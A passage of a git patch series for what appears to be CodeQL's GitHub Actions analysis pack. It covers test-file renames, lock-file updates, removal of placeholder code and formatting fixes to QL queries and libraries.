ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected rename to actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref rename to actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected rename to actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref rename to actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref diff --git a/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml rename to actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-918/RequestForgery.expected rename to actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-918/RequestForgery.qlref rename to actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref diff --git a/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml similarity index 100% rename from ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml rename to actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.expected b/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected similarity index 100% rename from ql/test/query-tests/SyntaxError/SyntaxError.expected rename to actions/ql/test/query-tests/SyntaxError/SyntaxError.expected diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref similarity index 100% rename from ql/test/query-tests/SyntaxError/SyntaxError.qlref rename to actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref diff --git a/ql/test/query-tests/SyntaxError/options b/actions/ql/test/query-tests/SyntaxError/options similarity index 100% rename from ql/test/query-tests/SyntaxError/options rename to actions/ql/test/query-tests/SyntaxError/options diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml similarity index 100% rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml similarity index 100% rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected similarity index 100% rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref similarity index 100% rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref diff --git a/codeql-workspace.yml b/codeql-workspace.yml deleted file mode 100644 index f00f92b346f9..000000000000 --- a/codeql-workspace.yml +++ /dev/null @@ -1,4 +0,0 @@ -provide: - - "**/ql/src/qlpack.yml" - - "**/ql/lib/qlpack.yml" - - "**/ql/test/qlpack.yml" From c7efe5d0f5d7735237dbef1290d3510a92ff257e Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 14:42:13 -0500 Subject: [PATCH 696/707] Update lock files --- actions/ql/lib/codeql-pack.lock.yml | 26 +------------------------- actions/ql/src/codeql-pack.lock.yml | 26 +------------------------- actions/ql/test/codeql-pack.lock.yml | 26 +------------------------- 3 files changed, 3 insertions(+), 75 deletions(-) diff --git a/actions/ql/lib/codeql-pack.lock.yml b/actions/ql/lib/codeql-pack.lock.yml index 2f4b6f858370..53004274575d 100644 --- a/actions/ql/lib/codeql-pack.lock.yml +++ b/actions/ql/lib/codeql-pack.lock.yml @@ -1,28 +1,4 @@ --- lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 1.0.12 - codeql/dataflow: - version: 1.1.6 - codeql/javascript-all: - version: 2.1.1 - codeql/mad: - version: 1.0.12 - codeql/regex: - version: 1.0.12 - codeql/ssa: - version: 1.0.12 - codeql/threat-models: - version: 1.0.12 - codeql/tutorial: - version: 1.0.12 - codeql/typetracking: - version: 1.0.12 - codeql/util: - version: 1.0.12 - codeql/xml: - version: 1.0.12 - codeql/yaml: - version: 1.0.12 +dependencies: {} compiled: false diff --git a/actions/ql/src/codeql-pack.lock.yml b/actions/ql/src/codeql-pack.lock.yml index 2f4b6f858370..53004274575d 100644 --- a/actions/ql/src/codeql-pack.lock.yml +++ b/actions/ql/src/codeql-pack.lock.yml @@ -1,28 +1,4 @@ --- lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 1.0.12 - codeql/dataflow: - version: 1.1.6 - codeql/javascript-all: - version: 2.1.1 - codeql/mad: - version: 1.0.12 - codeql/regex: - version: 1.0.12 - codeql/ssa: - version: 1.0.12 - codeql/threat-models: - version: 1.0.12 - codeql/tutorial: - version: 1.0.12 - codeql/typetracking: - version: 1.0.12 - codeql/util: - version: 1.0.12 - codeql/xml: - version: 1.0.12 - codeql/yaml: - version: 1.0.12 +dependencies: {} compiled: false diff --git a/actions/ql/test/codeql-pack.lock.yml b/actions/ql/test/codeql-pack.lock.yml index 2f4b6f858370..53004274575d 100644 --- a/actions/ql/test/codeql-pack.lock.yml +++ b/actions/ql/test/codeql-pack.lock.yml @@ -1,28 +1,4 @@ --- lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 1.0.12 - codeql/dataflow: - version: 1.1.6 - codeql/javascript-all: - version: 2.1.1 - codeql/mad: - version: 1.0.12 - codeql/regex: - version: 1.0.12 - codeql/ssa: - version: 1.0.12 - codeql/threat-models: - version: 1.0.12 - codeql/tutorial: - version: 1.0.12 - codeql/typetracking: - version: 1.0.12 - codeql/util: - version: 1.0.12 - codeql/xml: - version: 1.0.12 - codeql/yaml: - version: 1.0.12 +dependencies: {} compiled: false From 47e364a13b917e3ee2caeba1f6e36b13d1725913 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 14:51:24 -0500 Subject: [PATCH 697/707] Remove placeholder code --- actions/ql/src/Placeholder.ql | 16 ------------- .../test/library-tests/Placeholder.expected | 1 - actions/ql/test/library-tests/Placeholder.ql | 1 - .../Placeholder/.github/workflows/shell.yml | 23 ------------------- .../Placeholder/Placeholder.expected | 1 - .../query-tests/Placeholder/Placeholder.qlref | 1 - 6 files changed, 43 deletions(-) delete mode 100644 actions/ql/src/Placeholder.ql delete mode 100644 actions/ql/test/library-tests/Placeholder.expected delete mode 100644 actions/ql/test/library-tests/Placeholder.ql delete mode 100644 actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml delete mode 100644 actions/ql/test/query-tests/Placeholder/Placeholder.expected delete mode 100644 actions/ql/test/query-tests/Placeholder/Placeholder.qlref diff --git a/actions/ql/src/Placeholder.ql b/actions/ql/src/Placeholder.ql deleted file mode 100644 index 63e32f04dfb3..000000000000 --- a/actions/ql/src/Placeholder.ql +++ /dev/null @@ -1,16 +0,0 @@ -/** - * @name Placeholder Query - * @description Placeholder - * @kind problem - * @problem.severity warning - * @security-severity 9.3 - * @precision high - * @id actions/placeholder - * @tags actions security - */ - -import actions -import javascript - -from File f -select f, "Analyzed a file." diff --git a/actions/ql/test/library-tests/Placeholder.expected b/actions/ql/test/library-tests/Placeholder.expected deleted file mode 100644 index 2a4f078a25fc..000000000000 --- a/actions/ql/test/library-tests/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| 1 | diff --git a/actions/ql/test/library-tests/Placeholder.ql b/actions/ql/test/library-tests/Placeholder.ql deleted file mode 100644 index 82198eaf87be..000000000000 --- a/actions/ql/test/library-tests/Placeholder.ql +++ /dev/null @@ -1 +0,0 @@ -select 1 diff --git a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml b/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml deleted file mode 100644 index 9392b81c6ab2..000000000000 --- a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml +++ /dev/null @@ -1,23 +0,0 @@ -on: push - -jobs: - job1: - runs-on: ubuntu-latest - steps: - - shell: pwsh - run: Write-Output "foo" - job2: - runs-on: ubuntu-latest - steps: - - run: echo "foo" - - job3: - runs-on: windows-latest - steps: - - shell: bash - run: echo "foo" - job4: - runs-on: windows-latest - steps: - - run: Write-Output "foo" - diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.expected b/actions/ql/test/query-tests/Placeholder/Placeholder.expected deleted file mode 100644 index 82fd180be661..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | Analyzed a file. | diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref b/actions/ql/test/query-tests/Placeholder/Placeholder.qlref deleted file mode 100644 index 2ad15e688e23..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref +++ /dev/null @@ -1 +0,0 @@ -Placeholder.ql From 7891134a87a07cce8167dbd38cce76b689bce4b2 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 15:43:53 -0500 Subject: [PATCH 698/707] Fix formatting --- actions/ql/lib/codeql/actions/Cfg.qll | 1 - actions/ql/lib/codeql/actions/Consistency.ql | 2 - ...efaultableCodeQLInitiatlizeActionQuery.qll | 8 +- .../ql/lib/codeql/actions/config/Config.qll | 6 +- .../actions/config/ConfigExtensions.qll | 4 +- .../actions/ideContextual/IDEContextual.qll | 2 +- .../UseOfUnversionedImmutableAction.qll | 13 ++- .../ql/lib/ide-contextual-queries/printAst.ql | 1 - .../ql/lib/ide-contextual-queries/printCfg.ql | 88 +++++++++---------- .../CWE-829/UnversionedImmutableAction.ql | 5 +- .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 2 +- 11 files changed, 58 insertions(+), 74 deletions(-) diff --git a/actions/ql/lib/codeql/actions/Cfg.qll b/actions/ql/lib/codeql/actions/Cfg.qll index df7acf4e1c05..8ccc8de1d445 100644 --- a/actions/ql/lib/codeql/actions/Cfg.qll +++ b/actions/ql/lib/codeql/actions/Cfg.qll @@ -4,4 +4,3 @@ private import codeql.actions.controlflow.internal.Cfg as CfgInternal import CfgInternal::Completion import CfgInternal::CfgScope import CfgInternal::CfgImpl - diff --git a/actions/ql/lib/codeql/actions/Consistency.ql b/actions/ql/lib/codeql/actions/Consistency.ql index fa3a2bc9e5ce..a799ffce3a3a 100644 --- a/actions/ql/lib/codeql/actions/Consistency.ql +++ b/actions/ql/lib/codeql/actions/Consistency.ql @@ -1,3 +1 @@ import DataFlow::DataFlow::Consistency - - diff --git a/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll index ddec858aa62e..9bd9bd34dd44 100644 --- a/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll +++ b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll @@ -7,9 +7,7 @@ private import actions * uses: github/codeql-action/init@v2 * with: * languages: ruby, javascript - * */ - class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { DefaultableCodeQLInitiatlizeActionQuery() { this.getCallee() = "github/codeql-action/init" and @@ -17,7 +15,7 @@ class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { } } -/** +/** * Holds if the with: part of the workflow step contains any arguments for with: other than "languages". * e.g. * - name: Initialize CodeQL @@ -25,12 +23,10 @@ class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { * with: * languages: ${{ matrix.language }} * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml - * */ - predicate customizedWorkflowStep(UsesStep codeQLInitStep) { exists(string arg | exists(codeQLInitStep.getArgument(arg)) and arg != "languages" ) -} \ No newline at end of file +} diff --git a/actions/ql/lib/codeql/actions/config/Config.qll b/actions/ql/lib/codeql/actions/config/Config.qll index 20c6fae92731..265d4bd820f8 100644 --- a/actions/ql/lib/codeql/actions/config/Config.qll +++ b/actions/ql/lib/codeql/actions/config/Config.qll @@ -124,11 +124,7 @@ predicate vulnerableActionsDataModel( * Fields: * - action: action name */ -predicate immutableActionsDataModel( - string action -) { - Extensions::immutableActionsDataModel(action) -} +predicate immutableActionsDataModel(string action) { Extensions::immutableActionsDataModel(action) } /** * MaD models for untrusted git commands diff --git a/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll index 7ed1d546dbac..99ad7eb8df1b 100644 --- a/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -61,9 +61,7 @@ extensible predicate vulnerableActionsDataModel( /** * Holds for actions that are known to be immutable. */ -extensible predicate immutableActionsDataModel( - string action -); +extensible predicate immutableActionsDataModel(string action); /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. diff --git a/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll index 90ce11764b58..0e58b1d878be 100644 --- a/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll +++ b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll @@ -16,4 +16,4 @@ File getFileBySourceArchiveName(string name) { // We can handle 2 and 3 together by unconditionally adding a leading slash // before replacing double slashes. name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/") -} \ No newline at end of file +} diff --git a/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index bd14b6749206..ef258fce2e5c 100644 --- a/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -12,15 +12,14 @@ class UnversionedImmutableAction extends UsesStep { bindingset[version] predicate isSemVer(string version) { // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix - version.regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") - + version + .regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") or // or N or N.x or N.N.x with optional v prefix - or version.regexpMatch("^v?[1-9]\\d*$") - or version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") - or version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") - + version.regexpMatch("^v?[1-9]\\d*$") or + version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") or + version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") or // or latest which will work - or version = "latest" + version = "latest" } predicate isImmutableAction(UsesStep actionStep, string actionName) { diff --git a/actions/ql/lib/ide-contextual-queries/printAst.ql b/actions/ql/lib/ide-contextual-queries/printAst.ql index 9effce3721f5..450f4446e361 100644 --- a/actions/ql/lib/ide-contextual-queries/printAst.ql +++ b/actions/ql/lib/ide-contextual-queries/printAst.ql @@ -26,4 +26,3 @@ class Cfg extends PrintAstConfiguration { n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile()) } } - diff --git a/actions/ql/lib/ide-contextual-queries/printCfg.ql b/actions/ql/lib/ide-contextual-queries/printCfg.ql index d4a90f87f923..4f4d76f5f13c 100644 --- a/actions/ql/lib/ide-contextual-queries/printCfg.ql +++ b/actions/ql/lib/ide-contextual-queries/printCfg.ql @@ -7,47 +7,47 @@ * @tags ide-contextual-queries/print-cfg */ - private import codeql.actions.Cfg - private import codeql.actions.Cfg::TestOutput - private import codeql.actions.ideContextual.IDEContextual - private import codeql.Locations - - /** - * Gets the source file to generate a CFG from. - */ - external string selectedSourceFile(); - - external string selectedSourceLine(); - - external string selectedSourceColumn(); - - bindingset[file, line, column] - private CfgScope smallestEnclosingScope(File file, int line, int column) { - result = - min(Location loc, CfgScope scope | - loc = scope.getLocation() and - ( - loc.getStartLine() < line - or - loc.getStartLine() = line and loc.getStartColumn() <= column - ) and - ( - loc.getEndLine() > line - or - loc.getEndLine() = line and loc.getEndColumn() >= column - ) and - loc.getFile() = file - | - scope - order by - loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn() - ) - } - - class MyRelevantNode extends RelevantNode { - MyRelevantNode() { - this.getScope() = - smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()), - selectedSourceLine().toInt(), selectedSourceColumn().toInt()) - } - } +private import codeql.actions.Cfg +private import codeql.actions.Cfg::TestOutput +private import codeql.actions.ideContextual.IDEContextual +private import codeql.Locations + +/** + * Gets the source file to generate a CFG from. + */ +external string selectedSourceFile(); + +external string selectedSourceLine(); + +external string selectedSourceColumn(); + +bindingset[file, line, column] +private CfgScope smallestEnclosingScope(File file, int line, int column) { + result = + min(Location loc, CfgScope scope | + loc = scope.getLocation() and + ( + loc.getStartLine() < line + or + loc.getStartLine() = line and loc.getStartColumn() <= column + ) and + ( + loc.getEndLine() > line + or + loc.getEndLine() = line and loc.getEndColumn() >= column + ) and + loc.getFile() = file + | + scope + order by + loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn() + ) +} + +class MyRelevantNode extends RelevantNode { + MyRelevantNode() { + this.getScope() = + smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()), + selectedSourceLine().toInt(), selectedSourceColumn().toInt()) + } +} diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index 0bc571ad4734..ac8cc249318e 100644 --- a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -14,6 +14,5 @@ import actions import codeql.actions.security.UseOfUnversionedImmutableAction from UnversionedImmutableAction step -select step, - "The workflow is using an eligible immutable action ($@) without semantic versioning", step, - step.getCallee() \ No newline at end of file +select step, "The workflow is using an eligible immutable action ($@) without semantic versioning", + step, step.getCallee() diff --git a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql index c2259473b9cd..dc65fab292b3 100644 --- a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql +++ b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql @@ -12,4 +12,4 @@ import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery from DefaultableCodeQLInitiatlizeActionQuery action -select action, "CodeQL Action could use default setup instead of advanced configuration." \ No newline at end of file +select action, "CodeQL Action could use default setup instead of advanced configuration." From d66cb7e8c720b537feef48fc45212984f644b591 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 15:48:34 -0500 Subject: [PATCH 699/707] Fix formatting --- actions/ql/test/library-tests/workflowenum.ql | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/actions/ql/test/library-tests/workflowenum.ql b/actions/ql/test/library-tests/workflowenum.ql index a4d4eb43bb21..3e0fe866ad3e 100644 --- a/actions/ql/test/library-tests/workflowenum.ql +++ b/actions/ql/test/library-tests/workflowenum.ql @@ -2,7 +2,6 @@ import actions import codeql.actions.config.ConfigExtensions as Extensions from - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) select trigger, path, job, secrets_source, permissions, runner From 99bdef12687f97807c9f70932ae487137e240133 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 15:56:49 -0500 Subject: [PATCH 700/707] Fix compilation warnings --- actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 5ceab79820bc..318cd2820a35 100644 --- a/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -97,9 +97,9 @@ private module Implementation implements CfgShared::InputSig { // Not using CFG splitting, so the following are just dummy types. private newtype TUnit = Unit() - class SplitKindBase = TUnit; + additional class 